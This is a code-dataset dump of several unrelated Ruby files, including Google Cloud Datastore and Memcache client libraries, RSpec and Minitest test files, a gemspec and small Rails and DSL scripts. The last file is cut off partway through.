6a71a75350d415e6edabc130ca4a7fa073566f51 | 7,656 | # Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "google/cloud/datastore/dataset/lookup_results"
require "google/cloud/datastore/dataset/query_results"
module Google
module Cloud
module Datastore
##
# # ReadOnlyTransaction
#
# Represents a read-only Datastore transaction that only allows reads.
#
# A read-only transaction cannot modify entities; in return they do not
# contend with other read-write or read-only transactions. Using a
# read-only transaction for transactions that only read data will
# potentially improve throughput.
#
# See {Google::Cloud::Datastore::Dataset#transaction}
#
# @see https://cloud.google.com/datastore/docs/concepts/transactions
# Transactions
#
# @example
# require "google/cloud/datastore"
#
# datastore = Google::Cloud::Datastore.new
#
# task_list_key = datastore.key "TaskList", "default"
# query = datastore.query("Task").
# ancestor(task_list_key)
#
# tasks = nil
#
# datastore.read_only_transaction do |tx|
# task_list = tx.find task_list_key
# if task_list
# tasks = tx.run query
# end
# end
#
class ReadOnlyTransaction
attr_reader :id
##
# @private The Service object.
attr_accessor :service
##
# @private Creates a new ReadOnlyTransaction instance.
# Takes a Service instead of project and Credentials.
#
def initialize service
@service = service
reset!
start
end
##
# Retrieve an entity by providing key information. The lookup is run
# within the transaction.
#
# @param [Key, String] key_or_kind A Key object or `kind` string value.
#
# @return [Google::Cloud::Datastore::Entity, nil]
#
# @example
# require "google/cloud/datastore"
#
# datastore = Google::Cloud::Datastore.new
#
# task_list_key = datastore.key "TaskList", "default"
#
# datastore.read_only_transaction do |tx|
# task_list = tx.find task_list_key
# end
#
def find key_or_kind, id_or_name = nil
key = key_or_kind
unless key.is_a? Google::Cloud::Datastore::Key
key = Key.new key_or_kind, id_or_name
end
find_all(key).first
end
alias get find
##
# Retrieve the entities for the provided keys. The lookup is run within
# the transaction.
#
# @param [Key] keys One or more Key objects to find records for.
#
# @return [Google::Cloud::Datastore::Dataset::LookupResults]
#
# @example
# require "google/cloud/datastore"
#
# datastore = Google::Cloud::Datastore.new
#
# task_key1 = datastore.key "Task", 123456
# task_key2 = datastore.key "Task", 987654
#
# datastore.read_only_transaction do |tx|
# tasks = tx.find_all task_key1, task_key2
# end
#
def find_all *keys
ensure_service!
lookup_res = service.lookup(*Array(keys).flatten.map(&:to_grpc),
transaction: @id)
Dataset::LookupResults.from_grpc lookup_res, service, nil, @id
end
alias lookup find_all
##
# Retrieve entities specified by a Query. The query is run within the
# transaction.
#
# @param [Query] query The Query object with the search criteria.
# @param [String] namespace The namespace the query is to run within.
#
# @return [Google::Cloud::Datastore::Dataset::QueryResults]
#
# @example
# require "google/cloud/datastore"
#
# datastore = Google::Cloud::Datastore.new
#
# query = datastore.query("Task").
# where("done", "=", false)
# datastore.read_only_transaction do |tx|
# tasks = tx.run query
# end
#
def run query, namespace: nil
ensure_service!
unless query.is_a?(Query) || query.is_a?(GqlQuery)
raise ArgumentError, "Cannot run a #{query.class} object."
end
query_res = service.run_query query.to_grpc, namespace,
transaction: @id
Dataset::QueryResults.from_grpc query_res, service, namespace,
query.to_grpc.dup
end
alias run_query run
##
# Begins a transaction.
# This method is run when a new ReadOnlyTransaction is created.
#
def start
raise TransactionError, "Transaction already opened." unless @id.nil?
ensure_service!
tx_res = service.begin_transaction read_only: true
@id = tx_res.transaction
end
alias begin_transaction start
##
# Commits the transaction.
#
# @example
# require "google/cloud/datastore"
#
# datastore = Google::Cloud::Datastore.new
#
# task_list_key = datastore.key "TaskList", "default"
# query = datastore.query("Task").
# ancestor(task_list_key)
#
# tx = datastore.transaction
# task_list = tx.find task_list_key
# if task_list
# tasks = tx.run query
# end
# tx.commit
#
def commit
if @id.nil?
raise TransactionError, "Cannot commit when not in a transaction."
end
ensure_service!
service.commit [], transaction: @id
true
end
##
# Rolls back the transaction.
#
# @example
# require "google/cloud/datastore"
#
# datastore = Google::Cloud::Datastore.new
#
# task_list_key = datastore.key "TaskList", "default"
# query = datastore.query("Task").
# ancestor(task_list_key)
#
# tx = datastore.transaction
# task_list = tx.find task_list_key
# if task_list
# tasks = tx.run query
# end
# tx.rollback
#
def rollback
if @id.nil?
raise TransactionError, "Cannot rollback when not in a transaction."
end
ensure_service!
service.rollback @id
true
end
##
# Reset the transaction.
# {ReadOnlyTransaction#start} must be called afterwards.
def reset!
@id = nil
end
protected
##
# @private Raise an error unless an active connection to the service is
# available.
def ensure_service!
raise "Must have active connection to service" unless service
end
end
end
end
end
| 30.501992 | 80 | 0.560345 |
0113930862fa33800225f0d8aa59f5e0a065c1ca | 317 | require 'spec_helper'
RSpec.describe Phantomblaster::Configuration do
subject { described_class.new }
it { expect(subject).to respond_to(:api_key) }
it { expect(subject).to respond_to(:api_key=) }
it { expect(subject).to respond_to(:scripts_dir) }
it { expect(subject).to respond_to(:scripts_dir=) }
end
| 26.416667 | 53 | 0.731861 |
1ac764c200dbfc8d5ac73f3852ddfbb413d40fc5 | 579 | require 'tmpdir'
require 'equivalent-xml/rspec_matchers'
require 'byebug'
require 'simplecov'
require 'coveralls'
SimpleCov.formatter = Coveralls::SimpleCov::Formatter
SimpleCov.start do
track_files "bin/**/*"
track_files "devel/**/*.rb"
add_filter "spec/**/*.rb"
end
puts "running in #{ENV['ROBOT_ENVIRONMENT']} mode"
bootfile = File.expand_path(File.dirname(__FILE__) + '/../config/boot')
require bootfile
tmp_output_dir = File.join(PRE_ASSEMBLY_ROOT, 'tmp')
FileUtils.mkdir_p tmp_output_dir
def noko_doc(x)
Nokogiri.XML(x) { |conf| conf.default_xml.noblanks }
end
| 24.125 | 71 | 0.749568 |
ed208ecdaaeaa39aab0fcf8caca1ffb2d6746021 | 1,748 | # ------------------------------------------------------------
# MicroApp: Ruby GEM
# ------------------------------------------------------------
KDsl.microapp :r03_props do
settings do
name parent.key
app_type :react
title 'R03 Props'
description 'R03 Props '
application 'r03-props'
git_repo_name 'r03-props'
git_organization 'klueless-react-samples'
avatar 'UX Designer'
main_story 'As a Front End Developer, I quickly understand components, state and functions, so that I can build complex react applications'
author 'David Cruwys'
author_email '[email protected]'
copyright_date '2021'
website 'http://appydave.com/react/samples/r03-props'
application_lib_path 'r03-props'
namespace_root 'r03-props'
template_rel_path 'react'
app_path '~/dev/react/r03-props'
data_path '_/.data'
end
is_run = 1
def on_action
s = d.settings
# github_del_repo s.git_repo_name, organization: 'klueless-react-samples'
github_new_repo s.git_repo_name, organization: 'klueless-react-samples'
run_command "npx create-react-app ."
run_command 'code .' # run_command will ensure the folder exists
new_blueprint :bootstrap , definition_subfolder: 'react', output_filename: 'bootstrap.rb', f: false, show_editor: true
end if is_run == 1
L.warn 'set is_run to true if you want to run the action' if is_run == 0
end
| 40.651163 | 162 | 0.528032 |
1ca765d136f868f7f953666617027d82bbc5a4ce | 2,093 | #
# Author:: Adam Jacob (<[email protected]>)
# Copyright:: Copyright (c) 2008-2016 Chef Software, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "spec_helper"
describe Ohai::System, "plugin kernel" do
before do
@plugin = get_plugin("kernel")
allow(@plugin).to receive(:collect_os).and_return(:default) # for debugging
allow(@plugin).to receive(:shell_out).with("uname -s").and_return(mock_shell_out(0, "Darwin\n", ""))
allow(@plugin).to receive(:shell_out).with("uname -r").and_return(mock_shell_out(0, "9.5.0\n", ""))
allow(@plugin).to receive(:shell_out).with("uname -v").and_return(mock_shell_out(0, "Darwin Kernel Version 9.5.0: Wed Sep 3 11:29:43 PDT 2008; root:xnu-1228.7.58~1\/RELEASE_I386\n", ""))
allow(@plugin).to receive(:shell_out).with("uname -m").and_return(mock_shell_out(0, "i386\n", ""))
allow(@plugin).to receive(:shell_out).with("uname -o").and_return(mock_shell_out(0, "Linux\n", ""))
allow(@plugin).to receive(:shell_out).with("uname -p").and_return(mock_shell_out(0, "i386\n", ""))
end
it_should_check_from_mash("kernel", "name", "uname -s", [0, "Darwin\n", ""])
it_should_check_from_mash("kernel", "release", "uname -r", [0, "9.5.0\n", ""])
it_should_check_from_mash("kernel", "version", "uname -v", [0, "Darwin Kernel Version 9.5.0: Wed Sep 3 11:29:43 PDT 2008; root:xnu-1228.7.58~1\/RELEASE_I386\n", ""])
it_should_check_from_mash("kernel", "machine", "uname -m", [0, "i386\n", ""])
it_should_check_from_mash("kernel", "processor", "uname -p", [0, "i386\n", ""])
end
| 53.666667 | 191 | 0.694219 |
6a1ab72cf16c105549364533cb5d8cf07facad00 | 188 | require 'spec_helper'
describe Jsg do
it 'has a version number' do
expect(Jsg::VERSION).not_to be nil
end
it 'does something useful' do
expect(false).to eq(true)
end
end
| 15.666667 | 38 | 0.691489 |
3871214d7a4f1ae946ae590268717e6f9cb54863 | 716 | # frozen_string_literal: true
module Docs
module V1
module Tasks
extend Dox::DSL::Syntax
document :api do
resource 'Tasks' do
endpoint '/projects/:id/tasks'
group 'Tasks'
end
end
document :index do
action 'Get tasks'
end
document :create do
action 'Create task'
end
document :show do
action 'Read task'
end
document :update do
action 'Update task'
end
document :delete do
action 'Delete task'
end
document :complete do
action 'Complete task'
end
document :position do
action 'Up task'
end
end
end
end
| 15.911111 | 40 | 0.541899 |
1ac0e5ddbe0862ed31f95c2f3d874c402039baea | 145 | require 'peperusha/version'
require 'peperusha/authenticate'
module Peperusha
class Error < StandardError; end
# Your code goes here...
end
| 18.125 | 34 | 0.765517 |
1d5507ac7565103955ec249d11590260990e2c56 | 281 | # frozen_string_literal: true
# add the build->push process onto the end of the deploy:published stack
# after 'deploy:published', 'docker:capdeploy_hook'
# push the no_release auto-cull to the very front of the task stack
# before 'deploy:starting', 'docker:trim_release_roles'
| 35.125 | 72 | 0.779359 |
bf97b12e8bca6a1add87fc0937858595b035572f | 349 | # frozen_string_literal: true
namespace :action_text_lite do
desc "Copy over the migration"
task install: %w( copy_migrations )
task :copy_migrations do
Rake::Task["railties:install:migrations"].reenable # Otherwise you can't run 2 migration copy tasks in one invocation
Rake::Task["action_text:install:migrations"].invoke
end
end
| 29.083333 | 121 | 0.762178 |
3926c4fe5a7242d0071cac3e454f396ee52fc2cf | 2,823 | require 'test_helper'
describe "Fog::Network[:openstack] | lb_vip requests" do
describe "success" do
before do
@lb_vip_format = {
'id' => String,
'subnet_id' => String,
'pool_id' => String,
'protocol' => String,
'protocol_port' => Integer,
'name' => String,
'description' => String,
'address' => String,
'port_id' => String,
'session_persistence' => Hash,
'connection_limit' => Integer,
'status' => String,
'admin_state_up' => Fog::Boolean,
'tenant_id' => String
}
subnet_id = "subnet_id"
pool_id = "pool_id"
protocol = 'HTTP'
protocol_port = 80
attributes = {
:name => 'test-vip',
:description => 'Test VIP',
:address => '10.0.0.1',
:connection_limit => 10,
:session_persistence => {"cookie_name" => "COOKIE_NAME", "type" => "APP_COOKIE"},
:admin_state_up => true,
:tenant_id => 'tenant_id'
}
@lb_vip = network.create_lb_vip(subnet_id, pool_id, protocol, protocol_port, attributes).body
@lb_vip_id = @lb_vip["vip"]["id"]
end
it "#create_lb_vip" do
@lb_vip.must_match_schema('vip' => @lb_vip_format)
end
it "#list_lb_vips" do
network.list_lb_vips.body.must_match_schema('vips' => [@lb_vip_format])
end
it "#get_lb_vip" do
lb_vip_id = network.lb_vips.all.first.id
network.get_lb_vip(lb_vip_id).body.
must_match_schema('vip' => @lb_vip_format)
end
it "#update_lb_vip" do
lb_vip_id = network.lb_vips.all.first.id
attributes = {
:pool_id => "new_pool_id",
:name => "new-test-vip",
:description => "New Test VIP",
:connection_limit => 5,
:session_persistence => {"type" => "HTTP_COOKIE"},
:admin_state_up => false
}
network.update_lb_vip(lb_vip_id, attributes).body.
must_match_schema('vip' => @lb_vip_format)
end
it "#delete_lb_vip" do
lb_vip_id = network.lb_vips.all.first.id
network.delete_lb_vip(lb_vip_id).status.must_equal 204
end
end
describe "failure" do
it "#get_lb_vip" do
proc do
network.get_lb_vip(0)
end.must_raise Fog::Network::OpenStack::NotFound
end
it "#update_lb_vip" do
proc do
network.update_lb_vip(0, {})
end.must_raise Fog::Network::OpenStack::NotFound
end
it "#delete_lb_vip" do
proc do
network.delete_lb_vip(0)
end.must_raise Fog::Network::OpenStack::NotFound
end
end
end
| 30.354839 | 100 | 0.541977 |
21fee78bf8f9fd32d3e0e124dad26aa23c27b838 | 876 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'mercadolibre/version'
Gem::Specification.new do |spec|
spec.name = "mercadolibre"
spec.version = Mercadolibre::VERSION
spec.authors = ["Matias Hick"]
spec.email = ["[email protected]"]
spec.summary = "Connect to Mercadolibre through Meli API"
spec.description = "Connect to Mercadolibre through Meli API"
spec.homepage = "https://github.com/unformattmh/mercadolibre"
spec.license = "MIT"
spec.files = Dir["LICENSE.md", "README.md", "CHANGELOG.md", "lib/**/*"]
spec.executables = []
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.5"
spec.add_development_dependency "rake"
spec.add_runtime_dependency "rest-client", "~> 1.6.7"
end
| 35.04 | 81 | 0.665525 |
1cac3df190d05f83885468ed5ead13a3568d24f4 | 226 | # Allows for assertion of a location against the qct_qda HubZone layer
class QctQdaAssertion
extend AssertionHelper
class << self
def assertion(location)
assertion_by_type('qct_qda', location)
end
end
end
| 20.545455 | 70 | 0.747788 |
ed06c5efc526ee8810045f2f01d93e2dcf687780 | 47,701 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/memcache/v1/cloud_memcache_pb"
module Google
module Cloud
module Memcache
module V1
module CloudMemcache
##
# Client for the CloudMemcache service.
#
# Configures and manages Cloud Memorystore for Memcached instances.
#
#
# The `memcache.googleapis.com` service implements the Google Cloud Memorystore
# for Memcached API and defines the following resource model for managing
# Memorystore Memcached (also called Memcached below) instances:
# * The service works with a collection of cloud projects, named: `/projects/*`
# * Each project has a collection of available locations, named: `/locations/*`
# * Each location has a collection of Memcached instances, named:
# `/instances/*`
# * As such, Memcached instances are resources of the form:
# `/projects/{project_id}/locations/{location_id}/instances/{instance_id}`
#
# Note that location_id must be a GCP `region`; for example:
# * `projects/my-memcached-project/locations/us-central1/instances/my-memcached`
#
class Client
include Paths
# @private
attr_reader :cloud_memcache_stub
##
# Configure the CloudMemcache Client class.
#
# See {::Google::Cloud::Memcache::V1::CloudMemcache::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all CloudMemcache clients:
#
# ::Google::Cloud::Memcache::V1::CloudMemcache::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Memcache", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config.rpcs.list_instances.timeout = 1200.0
default_config.rpcs.get_instance.timeout = 1200.0
default_config.rpcs.create_instance.timeout = 1200.0
default_config.rpcs.update_instance.timeout = 1200.0
default_config.rpcs.update_parameters.timeout = 1200.0
default_config.rpcs.delete_instance.timeout = 1200.0
default_config.rpcs.apply_parameters.timeout = 1200.0
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the CloudMemcache Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Memcache::V1::CloudMemcache::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new CloudMemcache client object.
#
# ## Examples
#
# To create a new CloudMemcache client with the default
# configuration:
#
# client = ::Google::Cloud::Memcache::V1::CloudMemcache::Client.new
#
# To create a new CloudMemcache client with a custom
# configuration:
#
# client = ::Google::Cloud::Memcache::V1::CloudMemcache::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the CloudMemcache client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/cloud/memcache/v1/cloud_memcache_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the scope and endpoint are unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.scope == Client.configure.scope &&
@config.endpoint == Client.configure.endpoint &&
[email protected](".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@operations_client = Operations.new do |config|
config.credentials = credentials
config.endpoint = @config.endpoint
end
@cloud_memcache_stub = ::Gapic::ServiceStub.new(
::Google::Cloud::Memcache::V1::CloudMemcache::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
##
# Get the associated client for long-running operations.
#
# @return [::Google::Cloud::Memcache::V1::CloudMemcache::Operations]
#
attr_reader :operations_client
# Service calls
##
# Lists Instances in a given location.
#
# @overload list_instances(request, options = nil)
# Pass arguments to `list_instances` via a request object, either of type
# {::Google::Cloud::Memcache::V1::ListInstancesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::ListInstancesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_instances(parent: nil, page_size: nil, page_token: nil, filter: nil, order_by: nil)
# Pass arguments to `list_instances` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The resource name of the instance location using the form:
# `projects/{project_id}/locations/{location_id}`
# where `location_id` refers to a GCP region
# @param page_size [::Integer]
# The maximum number of items to return.
#
# If not specified, a default value of 1000 will be used by the service.
# Regardless of the page_size value, the response may include a partial list
# and a caller should only rely on response's
# [next_page_token][CloudMemcache.ListInstancesResponse.next_page_token]
# to determine if there are more instances left to be queried.
# @param page_token [::String]
# The next_page_token value returned from a previous List request,
# if any.
# @param filter [::String]
# List filter. For example, exclude all Memcached instances with name as
# my-instance by specifying "name != my-instance".
# @param order_by [::String]
# Sort results. Supported values are "name", "name desc" or "" (unsorted).
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Google::Cloud::Memcache::V1::Instance>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Google::Cloud::Memcache::V1::Instance>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def list_instances request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::ListInstancesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_instances.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"parent" => request.parent
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_instances.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_instances.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :list_instances, request, options: options do |response, operation|
response = ::Gapic::PagedEnumerable.new @cloud_memcache_stub, :list_instances, request, response, operation, options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets details of a single Instance.
#
# @overload get_instance(request, options = nil)
# Pass arguments to `get_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::GetInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::GetInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_instance(name: nil)
# Pass arguments to `get_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. Memcached instance resource name in the format:
# `projects/{project_id}/locations/{location_id}/instances/{instance_id}`
# where `location_id` refers to a GCP region
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Memcache::V1::Instance]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Memcache::V1::Instance]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def get_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::GetInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"name" => request.name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_instance.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :get_instance, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Creates a new Instance in a given location.
#
# @overload create_instance(request, options = nil)
# Pass arguments to `create_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::CreateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::CreateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_instance(parent: nil, instance_id: nil, instance: nil)
# Pass arguments to `create_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The resource name of the instance location using the form:
# `projects/{project_id}/locations/{location_id}`
# where `location_id` refers to a GCP region
# @param instance_id [::String]
# Required. The logical name of the Memcached instance in the user
# project with the following restrictions:
#
# * Must contain only lowercase letters, numbers, and hyphens.
# * Must start with a letter.
# * Must be between 1-40 characters.
# * Must end with a number or a letter.
# * Must be unique within the user project / location
#
# If any of the above are not met, will raise an invalid argument error.
# @param instance [::Google::Cloud::Memcache::V1::Instance, ::Hash]
# Required. A Memcached Instance
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def create_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::CreateInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"parent" => request.parent
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_instance.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :create_instance, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates an existing Instance in a given project and location.
#
# @overload update_instance(request, options = nil)
# Pass arguments to `update_instance` via a request object, either of type
# {::Google::Cloud::Memcache::V1::UpdateInstanceRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::UpdateInstanceRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_instance(update_mask: nil, instance: nil)
# Pass arguments to `update_instance` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. Mask of fields to update.
# * `displayName`
# @param instance [::Google::Cloud::Memcache::V1::Instance, ::Hash]
# Required. A Memcached Instance.
# Only fields specified in update_mask are updated.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
def update_instance request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Memcache::V1::UpdateInstanceRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.update_instance.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Memcache::V1::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"instance.name" => request.instance.name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.update_instance.timeout,
metadata: metadata,
retry_policy: @config.rpcs.update_instance.retry_policy
options.apply_defaults metadata: @config.metadata,
retry_policy: @config.retry_policy
@cloud_memcache_stub.call_rpc :update_instance, request, options: options do |response, operation|
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates the defined Memcached Parameters for an existing Instance.
# This method only stages the parameters, it must be followed by
# ApplyParameters to apply the parameters to nodes of the Memcached Instance.
#
# @overload update_parameters(request, options = nil)
# Pass arguments to `update_parameters` via a request object, either of type
# {::Google::Cloud::Memcache::V1::UpdateParametersRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Memcache::V1::UpdateParametersRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_parameters(name: nil, update_mask: nil, parameters: nil)
# Pass arguments to `update_parameters` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
